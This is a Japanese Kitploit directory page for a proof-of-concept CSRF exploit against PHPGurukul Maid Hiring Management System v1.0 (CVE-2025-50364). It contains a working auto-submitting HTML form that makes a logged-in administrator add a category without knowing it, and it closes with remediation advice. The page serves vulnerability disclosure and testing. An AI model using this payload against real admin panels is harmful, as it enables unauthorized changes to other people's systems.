Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE — CVE-2025-50364(PHPGurukul Maid Hiring Management System v1.0)を標的とした概念実証(PoC)のCSRFエクスプロイト。細工されたHTMLフォームを介して任意の管理者カテゴリを追加します。 | Kitploit
ツール/GitHubGitHub/1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHub1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve

CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE

CVE-2025-50364(PHPGurukul Maid Hiring Management System v1.0)を標的とした概念実証(PoC)のCSRFエクスプロイト。細工されたHTMLフォームを介して任意の管理者カテゴリを追加します。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

プロジェクト名とリポジトリURL: Maid Hiring Management System using PHP and MySQL

脆弱性タイプ: クライアントサイドリクエストフォージェリ

影響を受けるバージョン: v1.0

💣脆弱性の説明: PHPGurukul Hiring Management Systemの管理パネルにクロスサイトリクエストフォージェリ (CSRF) 脆弱性が存在します。これにより、攻撃者は認証済み管理者を悪意のあるサイトに誘導し、任意の採用カテゴリを追加できます。この脆弱性はデータの汚染や権限のない管理者レベルの変更を引き起こす可能性があります。

👩‍💻影響: 権限のないカテゴリ作成

🛜概念実証 (PoC)

  1. 認証済み管理者のみがカテゴリを追加できる機能が存在していました。 1
  2. エンドポイント /admin/add-category.php にPOSTリクエストを送信するHTMLコード CSRF-POC 2
root@kitploit:~
<html>
  <body>
    <form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
      <input type="hidden" name="catname" value="CSRF&#45;POC" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. HTMLコードを使用して悪意のあるURLを作成します。 3
  • 管理者がリンクをクリックすると、新しいカテゴリが追加されます。 4 5
  • 推奨事項: 管理フォームへのCSRFトークンの実装、SameSite Cookieの適用、リクエスト発信元の検証を実施し、不正な操作を防止してください。

    ツールをダウンロード